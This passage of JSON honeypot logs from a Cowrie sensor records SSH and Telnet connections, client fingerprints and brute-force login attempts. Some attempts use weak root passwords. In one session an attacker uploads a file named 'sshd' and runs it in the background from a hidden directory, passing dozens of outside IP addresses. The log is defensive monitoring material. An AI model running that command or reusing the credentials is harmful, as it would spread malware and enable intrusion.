ac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:03:43.757016Z","src_ip":"45.88.8.186","session":"fc17061821ef"}
{"eventid":"cowrie.login.success","username":"root","password":"007700","message":"login attempt [root/007700] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:03:45.664834Z","src_ip":"45.88.8.186","session":"fc17061821ef"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:03:46.822484Z","src_ip":"45.88.8.186","session":"fc17061821ef"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51552,"dst_ip":"1.2.3.4","dst_port":22,"session":"45c373f95b11","protocol":"ssh","message":"New connection: 217.72.205.35:51552 (1.2.3.4:22) [session: 45c373f95b11]","sensor":"my-vps","timestamp":"2025-08-26T18:04:55.399346Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:04:55.400576Z","src_ip":"217.72.205.35","session":"45c373f95b11"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:05:15.109649Z","src_ip":"212.227.235.229","session":"6a1f10707775"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58969,"dst_ip":"1.2.3.4","dst_port":23,"session":"90389099f9f7","protocol":"telnet","message":"New connection: 212.227.235.229:58969 (1.2.3.4:23) [session: 90389099f9f7]","sensor":"my-vps","timestamp":"2025-08-26T18:05:29.167006Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63806,"dst_ip":"1.2.3.4","dst_port":22,"session":"d69b9adcbc2f","protocol":"ssh","message":"New connection: 212.227.125.160:63806 (1.2.3.4:22) [session: d69b9adcbc2f]","sensor":"my-vps","timestamp":"2025-08-26T18:05:35.732347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T18:05:35.733464Z","src_ip":"212.227.125.160","session":"d69b9adcbc2f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T18:05:35.818362Z","src_ip":"212.227.125.160","session":"d69b9adcbc2f"}
{"eventid":"cowrie.login.failed","username":"paris","password":"paris","message":"login attempt [paris/paris] failed","sensor":"my-vps","timestamp":"2025-08-26T18:05:36.620711Z","src_ip":"212.227.125.160","session":"d69b9adcbc2f"}
{"eventid":"cowrie.login.failed","username":"paris","password":"paris1","message":"login attempt [paris/paris1] failed","sensor":"my-vps","timestamp":"2025-08-26T18:05:37.707905Z","src_ip":"212.227.125.160","session":"d69b9adcbc2f"}
{"eventid":"cowrie.login.failed","username":"paris","password":"paris123","message":"login attempt [paris/paris123] failed","sensor":"my-vps","timestamp":"2025-08-26T18:05:38.799278Z","src_ip":"212.227.125.160","session":"d69b9adcbc2f"}
{"eventid":"cowrie.login.failed","username":"paris","password":"paris1234","message":"login attempt [paris/paris1234] failed","sensor":"my-vps","timestamp":"2025-08-26T18:05:39.887025Z","src_ip":"212.227.125.160","session":"d69b9adcbc2f"}
{"eventid":"cowrie.login.failed","username":"paris","password":"paris12345","message":"login attempt [paris/paris12345] failed","sensor":"my-vps","timestamp":"2025-08-26T18:05:40.974343Z","src_ip":"212.227.125.160","session":"d69b9adcbc2f"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:05:42.064505Z","src_ip":"212.227.125.160","session":"d69b9adcbc2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34116,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbe638705fd9","protocol":"ssh","message":"New connection: 212.227.125.160:34116 (1.2.3.4:22) [session: dbe638705fd9]","sensor":"my-vps","timestamp":"2025-08-26T18:05:48.689604Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:05:48.690766Z","src_ip":"212.227.125.160","session":"dbe638705fd9"}
{"eventid":"cowrie.client.kex","hassh":"98ddc5604ef6a1006a2b49a58759fbe6","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98ddc5604ef6a1006a2b49a58759fbe6","sensor":"my-vps","timestamp":"2025-08-26T18:05:48.799985Z","src_ip":"212.227.125.160","session":"dbe638705fd9"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu","message":"login attempt [root/ubuntu] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:05:49.129348Z","src_ip":"212.227.125.160","session":"dbe638705fd9"}
{"eventid":"cowrie.session.closed","duration":31.423957347869873,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:06:00.590887Z","src_ip":"212.227.235.229","session":"90389099f9f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35236,"dst_ip":"1.2.3.4","dst_port":22,"session":"bdf85b7be82c","protocol":"ssh","message":"New connection: 212.227.235.229:35236 (1.2.3.4:22) [session: bdf85b7be82c]","sensor":"my-vps","timestamp":"2025-08-26T18:06:46.203128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:06:46.204330Z","src_ip":"212.227.235.229","session":"bdf85b7be82c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:06:46.437886Z","src_ip":"212.227.235.229","session":"bdf85b7be82c"}
{"eventid":"cowrie.login.failed","username":"rc","password":"123","message":"login attempt [rc/123] failed","sensor":"my-vps","timestamp":"2025-08-26T18:06:47.411500Z","src_ip":"212.227.235.229","session":"bdf85b7be82c"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:06:48.645898Z","src_ip":"212.227.235.229","session":"bdf85b7be82c"}
{"eventid":"cowrie.session.file_upload","filename":"sshd","outfile":"var/lib/cowrie/downloads/94f2e4d8d4436874785cd14e6e6d403507b8750852f7f2040352069a75da4c00","shasum":"94f2e4d8d4436874785cd14e6e6d403507b8750852f7f2040352069a75da4c00","message":"SFTP Uploaded file \"sshd\" to var/lib/cowrie/downloads/94f2e4d8d4436874785cd14e6e6d403507b8750852f7f2040352069a75da4c00","sensor":"my-vps","timestamp":"2025-08-26T18:07:35.826138Z","src_ip":"212.227.125.160","session":"dbe638705fd9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:07:36.201603Z","src_ip":"212.227.125.160","session":"dbe638705fd9"}
{"eventid":"cowrie.command.input","input":"chmod +x ./.5139919110999107421/sshd;nohup ./.5139919110999107421/sshd 83.168.69.143 51.81.116.121 54.218.69.206 125.87.91.29 125.87.85.142 103.234.237.22 175.148.96.136 217.79.189.145 103.75.125.133 82.156.38.8 34.244.27.115 13.231.135.146 108.165.164.143 193.111.236.229 113.229.58.156 192.227.153.63 125.87.81.36 56.125.148.70 125.44.160.237 220.192.228.195 123.30.140.225 43.143.159.39 66.206.224.115 13.203.105.238 188.166.249.22 125.87.80.253 16.162.163.175 42.6.177.246 125.87.89.102 69.197.155.210 64.188.69.146 125.87.90.229 175.165.147.26 125.87.84.155 1.195.60.21 113.229.57.13 113.229.60.53 13.115.130.247 5.135.34.71 13.218.130.198 125.87.95.91 125.87.86.252 36.152.32.178 42.6.177.84 175.165.164.127 117.236.124.182 125.87.80.223 175.148.99.229 54.178.90.203 118.178.183.89 62.210.130.180 &","message":"CMD: chmod +x ./.5139919110999107421/sshd;nohup ./.5139919110999107421/sshd 83.168.69.143 51.81.116.121 54.218.69.206 125.87.91.29 125.87.85.142 103.234.237.22 175.148.96.136 217.79.189.145 103.75.125.133 82.156.38.8 34.244.27.115 13.231.135.146 108.165.164.143 193.111.236.229 113.229.58.156 192.227.153.63 125.87.81.36 56.125.148.70 125.44.160.237 220.192.228.195 123.30.140.225 43.143.159.39 66.206.224.115 13.203.105.238 188.166.249.22 125.87.80.253 16.162.163.175 42.6.177.246 125.87.89.102 69.197.155.210 64.188.69.146 125.87.90.229 175.165.147.26 125.87.84.155 1.195.60.21 113.229.57.13 113.229.60.53 13.115.130.247 5.135.34.71 13.218.130.198 125.87.95.91 125.87.86.252 36.152.32.178 42.6.177.84 175.165.164.127 117.236.124.182 125.87.80.223 175.148.99.229 54.178.90.203 118.178.183.89 62.210.130.180 &","sensor":"my-vps","timestamp":"2025-08-26T18:07:36.202499Z","src_ip":"212.227.125.160","session":"dbe638705fd9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e59177a603eea413af2f62a5024906ba7001a2102dd6ec94769bab866f272876","size":136,"shasum":"e59177a603eea413af2f62a5024906ba7001a2102dd6ec94769bab866f272876","duplicate":false,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/e59177a603eea413af2f62a5024906ba7001a2102dd6ec94769bab866f272876 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:07:36.321718Z","src_ip":"212.227.125.160","session":"dbe638705fd9"}
{"eventid":"cowrie.session.closed","duration":"107.6","message":"Connection lost after 107.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:07:36.322858Z","src_ip":"212.227.125.160","session":"dbe638705fd9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47118,"dst_ip":"1.2.3.4","dst_port":22,"session":"d42c48ed0c7a","protocol":"ssh","message":"New connection: 212.227.235.229:47118 (1.2.3.4:22) [session: d42c48ed0c7a]","sensor":"my-vps","timestamp":"2025-08-26T18:09:02.455328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:09:02.456376Z","src_ip":"212.227.235.229","session":"d42c48ed0c7a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:09:02.735939Z","src_ip":"212.227.235.229","session":"d42c48ed0c7a"}
{"eventid":"cowrie.login.failed","username":"docker","password":"123","message":"login attempt [docker/123] failed","sensor":"my-vps","timestamp":"2025-08-26T18:09:03.896681Z","src_ip":"212.227.235.229","session":"d42c48ed0c7a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:09:05.178747Z","src_ip":"212.227.235.229","session":"d42c48ed0c7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58780,"dst_ip":"1.2.3.4","dst_port":22,"session":"996244673d9b","protocol":"ssh","message":"New connection: 212.227.125.160:58780 (1.2.3.4:22) [session: 996244673d9b]","sensor":"my-vps","timestamp":"2025-08-26T18:09:08.629233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:09:08.886938Z","src_ip":"212.227.125.160","session":"996244673d9b"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T18:09:08.887654Z","src_ip":"212.227.125.160","session":"996244673d9b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:09:09.934738Z","src_ip":"212.227.125.160","session":"996244673d9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58796,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ad625ca512c","protocol":"ssh","message":"New connection: 212.227.125.160:58796 (1.2.3.4:22) [session: 2ad625ca512c]","sensor":"my-vps","timestamp":"2025-08-26T18:09:10.116496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:09:10.434718Z","src_ip":"212.227.125.160","session":"2ad625ca512c"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T18:09:10.435858Z","src_ip":"212.227.125.160","session":"2ad625ca512c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:09:11.349764Z","src_ip":"212.227.125.160","session":"2ad625ca512c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58808,"dst_ip":"1.2.3.4","dst_port":22,"session":"525b9053855a","protocol":"ssh","message":"New connection: 212.227.125.160:58808 (1.2.3.4:22) [session: 525b9053855a]","sensor":"my-vps","timestamp":"2025-08-26T18:09:11.553987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:09:11.915369Z","src_ip":"212.227.125.160","session":"525b9053855a"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T18:09:11.916008Z","src_ip":"212.227.125.160","session":"525b9053855a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:09:13.286592Z","src_ip":"212.227.125.160","session":"525b9053855a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8386,"dst_ip":"1.2.3.4","dst_port":22,"session":"85cc6feb6084","protocol":"ssh","message":"New connection: 212.227.235.229:8386 (1.2.3.4:22) [session: 85cc6feb6084]","sensor":"my-vps","timestamp":"2025-08-26T18:09:37.070402Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:09:37.283600Z","src_ip":"212.227.235.229","session":"85cc6feb6084"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T18:09:37.284299Z","src_ip":"212.227.235.229","session":"85cc6feb6084"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:09:38.040341Z","src_ip":"212.227.235.229","session":"85cc6feb6084"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8400,"dst_ip":"1.2.3.4","dst_port":22,"session":"1937760c3c0d","protocol":"ssh","message":"New connection: 212.227.235.229:8400 (1.2.3.4:22) [session: 1937760c3c0d]","sensor":"my-vps","timestamp":"2025-08-26T18:09:38.260115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:09:38.447335Z","src_ip":"212.227.235.229","session":"1937760c3c0d"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T18:09:38.447984Z","src_ip":"212.227.235.229","session":"1937760c3c0d"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:09:39.202426Z","src_ip":"212.227.235.229","session":"1937760c3c0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8402,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b03b7f18e38","protocol":"ssh","message":"New connection: 212.227.235.229:8402 (1.2.3.4:22) [session: 8b03b7f18e38]","sensor":"my-vps","timestamp":"2025-08-26T18:09:39.383807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:09:39.647318Z","src_ip":"212.227.235.229","session":"8b03b7f18e38"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T18:09:39.647970Z","src_ip":"212.227.235.229","session":"8b03b7f18e38"}
